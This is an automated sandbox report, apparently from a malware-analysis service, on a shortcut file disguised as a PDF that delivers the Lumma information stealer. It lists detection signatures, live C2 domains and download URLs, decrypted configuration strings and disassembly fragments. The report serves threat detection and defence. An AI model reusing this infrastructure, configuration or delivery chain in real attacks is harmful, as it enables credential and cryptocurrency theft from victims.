Windows Analysis Report
CarrierAgreement.pdf.lnk.mal.lnk

Overview

General Information

Sample name: CarrierAgreement.pdf.lnk.mal.lnk
Analysis ID: 1466034
MD5: e3d78bb61a2b973ffc2fcf2764070f7c
SHA1: 91a9446b7055a30a46b301e6d12064be373ca48a
SHA256: 8684d2e593d6e6d9d65fb99ae3b45df32e8cbacb93312160a222f099c76391a8
Tags: lnk
Infos:

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
LummaC encrypted strings found
Performs DNS queries to domains with low reputation
Powershell drops PE file
Sample uses string decryption to hide its real strings
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Uses an obfuscated file name to hide its real file extension (double extension)
Very long command line found
Windows shortcut file (LNK) contains suspicious command line arguments
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Lumma Stealer, LummaC2 Stealer Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

AV Detection
barindex
Antivirus detection for URL or domain
Source: https://aplointexhausdh.xyz/ Avira URL Cloud: Label: malware
Source: https://panameradovkews.xyz/api Avira URL Cloud: Label: malware
Source: http://92.118.112.135/carrieragreementles(x86)=C Avira URL Cloud: Label: malware
Source: https://aplointexhausdh.xyz/apiH0 Avira URL Cloud: Label: malware
Source: http://92.118.112.135/agreement.pdf Avira URL Cloud: Label: malware
Source: https://proffyrobharborye.xyz/apiyz Avira URL Cloud: Label: malware
Source: https://panameradovkews.xyz/z/w0 Avira URL Cloud: Label: malware
Source: http://92.118.112.135/carrieragreement Avira URL Cloud: Label: malware
Source: https://depositybounceddwk.xyz/60 Avira URL Cloud: Label: malware
Source: https://panameradovkews.xyz/pi Avira URL Cloud: Label: malware
Source: https://proffyrobharborye.xyz/A0 Avira URL Cloud: Label: malware
Source: http://92.118.112.135/carrieragreementl; Avira URL Cloud: Label: malware
Source: http://92.118.112.135/carrieragreementC: Avira URL Cloud: Label: malware
Source: depositybounceddwk.xyz Avira URL Cloud: Label: malware
Source: http://92.118.112.135/carrieragreementeLMEMP Avira URL Cloud: Label: malware
Source: https://panameradovkews.xyz/Z0? Avira URL Cloud: Label: malware
Source: proffyrobharborye.xyz Avira URL Cloud: Label: malware
Source: aplointexhausdh.xyz Avira URL Cloud: Label: malware
Source: http://92.118.112.135/carrieragreement2 Avira URL Cloud: Label: malware
Source: compilecoppydkewsw.xyz Avira URL Cloud: Label: malware
Source: http://92.118.112.135/carrieragreement0 Avira URL Cloud: Label: malware
Source: http://92.118.112.135/carrieragreementlper.dllV Avira URL Cloud: Label: malware
Source: http://92.118.112.135/carrieragreementhttp://92.118.112.135/carrieragreement Avira URL Cloud: Label: malware
Source: https://depositybounceddwk.xyz/e0 Avira URL Cloud: Label: malware
Source: http://92.118.112.135/carrieragreementS Avira URL Cloud: Label: malware
Source: https://proffyrobharborye.xyz:443/api Avira URL Cloud: Label: malware
Source: https://panameradovkews.xyz:443/api Avira URL Cloud: Label: malware
Source: https://proffyrobharborye.xyz/ Avira URL Cloud: Label: malware
Source: http://92.118.112.135/carrieragreementH Avira URL Cloud: Label: malware
Source: https://panameradovkews.xyz/ Avira URL Cloud: Label: malware
Source: https://proffyrobharborye.xyz/l0- Avira URL Cloud: Label: malware
Source: https://aplointexhausdh.xyz/api Avira URL Cloud: Label: malware
Source: https://slammyslideplanntywks.xyz/ Avira URL Cloud: Label: malware
Source: https://depositybounceddwk.xyz/~0 Avira URL Cloud: Label: malware
Source: http://92.118.112.135/carrieragreement$global:? Avira URL Cloud: Label: malware
Source: https://panameradovkews.xyz/$0 Avira URL Cloud: Label: malware
Source: http://92.118.112.135/carrieragreementt Avira URL Cloud: Label: malware
Source: https://panameradovkews.xyz/apiYd Avira URL Cloud: Label: malware
Source: exertcreatedadnndjw.xyz Avira URL Cloud: Label: malware
Source: http://92.118.112.135/carrieragreement~ Avira URL Cloud: Label: malware
Source: https://proffyrobharborye.xyz/api Avira URL Cloud: Label: malware
Source: panameradovkews.xyz Avira URL Cloud: Label: malware
Source: http://92.118.112.135/carrieragreement... Avira URL Cloud: Label: malware
Source: http://92.118.112.135/carrieragreemente Avira URL Cloud: Label: malware
Source: http://92.118.112.135/carrieragreementLE_STRING=I1 Avira URL Cloud: Label: malware
Source: http://92.118.112.135/carrieragreementc Avira URL Cloud: Label: malware
Source: https://aplointexhausdh.xyz/apihd Avira URL Cloud: Label: malware
Source: https://depositybounceddwk.xyz/ Avira URL Cloud: Label: malware
Found malware configuration
Source: SmartyUninstaller4.exe.9020.15.memstrmin Malware Configuration Extractor: LummaC {"C2 url": ["proffyrobharborye.xyz", "panameradovkews.xyz", "aplointexhausdh.xyz", "manufactiredowreachhd.xyzu", "slammyslideplanntywks.xyzu", "depositybounceddwk.xyz", "exertcreatedadnndjw.xyz", "compilecoppydkewsw.xyz", "radiationcommentwks.xyz", "proffyrobharborye.xyz", "panameradovkews.xyz", "aplointexhausdh.xyz", "manufactiredowreachhd.xyzu", "slammyslideplanntywks.xyzu", "depositybounceddwk.xyz", "exertcreatedadnndjw.xyz", "compilecoppydkewsw.xyz", "radiationcommentwks.xyz", "proffyrobharborye.xyz", "panameradovkews.xyz", "aplointexhausdh.xyz", "manufactiredowreachhd.xyzu", "slammyslideplanntywks.xyzu", "depositybounceddwk.xyz", "exertcreatedadnndjw.xyz", "compilecoppydkewsw.xyz", "radiationcommentwks.xyz"], "Build id": "WjCmDJ--"}
Multi AV Scanner detection for domain / URL
Source: aplointexhausdh.xyz Virustotal: Detection: 12% Perma Link
Source: panameradovkews.xyz Virustotal: Detection: 11% Perma Link
Source: compilecoppydkewsw.xyz Virustotal: Detection: 12% Perma Link
Source: manufactiredowreachhd.xyz Virustotal: Detection: 12% Perma Link
Source: depositybounceddwk.xyz Virustotal: Detection: 12% Perma Link
Source: exertcreatedadnndjw.xyz Virustotal: Detection: 12% Perma Link
Source: proffyrobharborye.xyz Virustotal: Detection: 12% Perma Link
Source: slammyslideplanntywks.xyz Virustotal: Detection: 12% Perma Link
Source: https://panameradovkews.xyz/api Virustotal: Detection: 10% Perma Link
Source: https://panameradovkews.xyz/pi Virustotal: Detection: 10% Perma Link
Source: depositybounceddwk.xyz Virustotal: Detection: 12% Perma Link
Multi AV Scanner detection for submitted file
Source: CarrierAgreement.pdf.lnk.mal.lnk Virustotal: Detection: 27% Perma Link
Source: CarrierAgreement.pdf.lnk.mal.lnk ReversingLabs: Detection: 21%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Sample uses string decryption to hide its real strings
Source: 0000000F.00000002.2060165869.00000000023A0000.00000004.00001000.00020000.00000000.sdmp String decryptor: proffyrobharborye.xyz
Source: 0000000F.00000002.2060165869.00000000023A0000.00000004.00001000.00020000.00000000.sdmp String decryptor: panameradovkews.xyz
Source: 0000000F.00000002.2060165869.00000000023A0000.00000004.00001000.00020000.00000000.sdmp String decryptor: aplointexhausdh.xyz
Source: 0000000F.00000002.2060165869.00000000023A0000.00000004.00001000.00020000.00000000.sdmp String decryptor: manufactiredowreachhd.xyzu
Source: 0000000F.00000002.2060165869.00000000023A0000.00000004.00001000.00020000.00000000.sdmp String decryptor: slammyslideplanntywks.xyzu
Source: 0000000F.00000002.2060165869.00000000023A0000.00000004.00001000.00020000.00000000.sdmp String decryptor: depositybounceddwk.xyz
Source: 0000000F.00000002.2060165869.00000000023A0000.00000004.00001000.00020000.00000000.sdmp String decryptor: exertcreatedadnndjw.xyz
Source: 0000000F.00000002.2060165869.00000000023A0000.00000004.00001000.00020000.00000000.sdmp String decryptor: compilecoppydkewsw.xyz
Source: 0000000F.00000002.2060165869.00000000023A0000.00000004.00001000.00020000.00000000.sdmp String decryptor: radiationcommentwks.xyz
Source: 0000000F.00000002.2060165869.00000000023A0000.00000004.00001000.00020000.00000000.sdmp String decryptor: lid=%s&j=%s&ver=4.0
Source: 0000000F.00000002.2060165869.00000000023A0000.00000004.00001000.00020000.00000000.sdmp String decryptor: TeslaBrowser/5.5
Source: 0000000F.00000002.2060165869.00000000023A0000.00000004.00001000.00020000.00000000.sdmp String decryptor: - Screen Resoluton:
Source: 0000000F.00000002.2060165869.00000000023A0000.00000004.00001000.00020000.00000000.sdmp String decryptor: - Physical Installed Memory:
Source: 0000000F.00000002.2060165869.00000000023A0000.00000004.00001000.00020000.00000000.sdmp String decryptor: Workgroup: -
Source: 0000000F.00000002.2060165869.00000000023A0000.00000004.00001000.00020000.00000000.sdmp String decryptor: WjCmDJ--
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\agreement.pdf Jump to behavior
Source: Binary string: dialer.pdbGCTL source: mshta.exe, 00000003.00000003.1698099382.000002A348BD7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1698162082.000002A344A39000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2275633004.000002A344A39000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2273168560.000002A344A39000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2276837348.000002A344A39000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2271894344.000002A348BFB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.1698162082.000002A344A19000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2281903951.000002A3449DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2273384100.0000029B427E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2282608554.000002A344A39000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2272497103.000002A348BD7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2272811778.000002A3449D8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2272010421.000002A344A39000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2272533202.000002A3449C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2272010421.000002A344A19000.00000004.00000020.00020000.00000000.sdmp, carrieragreement[1].3.dr
Source: Binary string: dialer.pdb source: mshta.exe, 00000003.00000003.1698162082.000002A344A39000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2275633004.000002A344A39000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2273168560.000002A344A39000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2276837348.000002A344A39000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2281903951.000002A3449DA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2273384100.0000029B427E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2282608554.000002A344A39000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2272811778.000002A3449D8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2272010421.000002A344A39000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2272533202.000002A3449C1000.00000004.00000020.00020000.00000000.sdmp, carrieragreement[1].3.dr
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov ebx, dword ptr [edi+04h] 15_2_006F6FA6
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov ecx, dword ptr [esi+04h] 15_2_0070A026
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov ecx, dword ptr [00444FE8h] 15_2_007090EA
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov word ptr [ebx], cx 15_2_006E515D
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then lea ecx, dword ptr [esi+40h] 15_2_006F9157
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov ecx, dword ptr [esp] 15_2_00706126
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then lea ecx, dword ptr [esi+40h] 15_2_006F91C7
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov byte ptr [ebx], cl 15_2_006F81D5
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then jmp eax 15_2_006D31AD
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then jmp edx 15_2_006EF275
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov byte ptr [ebx], cl 15_2_006F8273
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then jmp edx 15_2_006EF204
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 15_2_006E92D5
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 15_2_006E9286
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov word ptr [ebx], cx 15_2_006E5373
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov word ptr [eax], cx 15_2_006F6305
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov ecx, dword ptr [esp] 15_2_006DB4F6
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov ecx, dword ptr [esp] 15_2_006DB4F6
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then cmp byte ptr [esi], 00000000h 15_2_006E562E
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then movsx eax, byte ptr [esi+ecx] 15_2_006DE6D6
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h 15_2_006E874A
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then jmp ecx 15_2_007077BE
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov eax, dword ptr [esp] 15_2_006E5796
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov byte ptr [ecx], al 15_2_006F9794
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov ecx, dword ptr [esi+18h] 15_2_006F88E4
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov ecx, dword ptr [esi+18h] 15_2_006F88DD
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then movzx ebx, byte ptr [edx] 15_2_00701966
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov word ptr [eax], cx 15_2_006F3949
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov ecx, dword ptr [esp+5Ch] 15_2_006E792E
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then jmp eax 15_2_006EF926
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov ecx, edi 15_2_006D89BB
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then movzx ebx, di 15_2_006F99B5
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov eax, dword ptr [esi+04h] 15_2_006F99B5
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then movzx ebx, di 15_2_006F9A47
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov eax, dword ptr [esi+04h] 15_2_006F9A47
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 15_2_006EFA59
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov byte ptr [eax], bl 15_2_006E0A26
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then jmp eax 15_2_006E3A15
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then movzx ebx, di 15_2_006F9A8C
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov eax, dword ptr [esi+04h] 15_2_006F9A8C
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then movzx ebx, di 15_2_006F9A9B
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov eax, dword ptr [esi+04h] 15_2_006F9A9B
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov ecx, dword ptr [esi] 15_2_006F5B6F
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov word ptr [eax], dx 15_2_006F5B6F
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then jmp eax 15_2_006EFBD4
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov byte ptr [ecx], al 15_2_006E8BD2
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then cmp dword ptr [edi+esi*8], E4AA2089h 15_2_006F2B96
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov ebx, eax 15_2_006D4E56
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov edx, dword ptr [esp+10h] 15_2_006DAE26
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov eax, dword ptr [esp] 15_2_006F1E36
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then cmp byte ptr [ecx], 00000000h 15_2_006E3ECE
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then jmp ecx 15_2_0070AECF
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then cmp byte ptr [ecx], 00000000h 15_2_006E3EAD
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov edi, dword ptr [esi+04h] 15_2_00709EBA
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov dword ptr [esi], eax 15_2_006F7EB6
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov dword ptr [esi], ecx 15_2_006F7EB6
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov ecx, dword ptr [esi+68h] 15_2_006F7EB6
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov byte ptr [ebx], al 15_2_006F7EB6
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then inc ebx 15_2_006E6F36
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then jmp eax 15_2_006DFFED
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then cmp dword ptr [ebx+edi*8], 11081610h 15_2_006F0FA6
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov ebx, dword ptr [edi+04h] 15_2_006F6FA6
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov ecx, dword ptr [esp] 15_2_02AB4700
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov ecx, dword ptr [esp+04h] 15_2_02AB73EA
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov ecx, dword ptr [esp+04h] 15_2_02AB7375
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then movzx ebx, di 15_2_02AA8021
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov eax, dword ptr [esi+04h] 15_2_02AA8021
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 15_2_02A9E033
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov byte ptr [eax], bl 15_2_02A8F000
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then movzx ebx, di 15_2_02AA8066
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov eax, dword ptr [esi+04h] 15_2_02AA8066
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then movzx ebx, di 15_2_02AA8075
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov eax, dword ptr [esi+04h] 15_2_02AA8075
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov byte ptr [ecx], al 15_2_02A971AC
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then jmp eax 15_2_02A9E1AF
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov ecx, edi 15_2_02A871A2
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then cmp dword ptr [edi+esi*8], E4AA2089h 15_2_02AA1170
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov ecx, dword ptr [esi] 15_2_02AA4149
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov word ptr [eax], dx 15_2_02AA4149
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov ecx, dword ptr [02AC4FE8h] 15_2_02AB76C4
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov ecx, dword ptr [esi+04h] 15_2_02AB8600
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov ebx, dword ptr [edi+04h] 15_2_02AA5580
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov byte ptr [ebx], cl 15_2_02AA67AF
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then lea ecx, dword ptr [esi+40h] 15_2_02AA77A1
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then jmp eax 15_2_02A81787
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then jmp edx 15_2_02A9D7DE
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then lea ecx, dword ptr [esi+40h] 15_2_02AA7731
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov word ptr [ebx], cx 15_2_02A93737
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then cmp byte ptr [ecx], 00000000h 15_2_02A924A8
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then jmp ecx 15_2_02AB94A9
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then cmp byte ptr [ecx], 00000000h 15_2_02A92487
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov dword ptr [esi], eax 15_2_02AA6490
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov dword ptr [esi], ecx 15_2_02AA6490
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov ecx, dword ptr [esi+68h] 15_2_02AA6490
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov byte ptr [ebx], al 15_2_02AA6490
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov edi, dword ptr [esi+04h] 15_2_02AB8494
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov ebx, eax 15_2_02A83430
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov edx, dword ptr [esp+10h] 15_2_02A89400
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov eax, dword ptr [esp] 15_2_02AA0410
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then cmp dword ptr [ebx+edi*8], 11081610h 15_2_02A9F580
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov ebx, dword ptr [edi+04h] 15_2_02AA5580
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then jmp eax 15_2_02A8E5C7
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then inc ebx 15_2_02A95510
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov eax, dword ptr [esi+08h] 15_2_02AA6AB7
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov eax, dword ptr [esi+08h] 15_2_02AA6AB4
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov ecx, dword ptr [esp] 15_2_02A89AD0
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov ecx, dword ptr [esp] 15_2_02A89AD0
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 15_2_02A978AF
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov word ptr [eax], cx 15_2_02AA48DF
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then jmp edx 15_2_02A9D84F
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov byte ptr [ebx], cl 15_2_02AA684D
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov word ptr [ebx], cx 15_2_02A9394D
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov ecx, dword ptr [esi+18h] 15_2_02AA6EBE
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov ecx, dword ptr [esi+18h] 15_2_02AA6EB7
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then movzx ebx, di 15_2_02AA7F8F
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov eax, dword ptr [esi+04h] 15_2_02AA7F8F
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then jmp eax 15_2_02A91FEF
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov word ptr [eax], cx 15_2_02AA1F23
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then mov ecx, dword ptr [esp+5Ch] 15_2_02A95F09
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then jmp eax 15_2_02A9DF00
Source: C:\Users\user\AppData\Roaming\SmartyUninstaller4.exe Code function: 4x nop then movzx ebx, byte ptr [edx] 15_2_02AAFF40
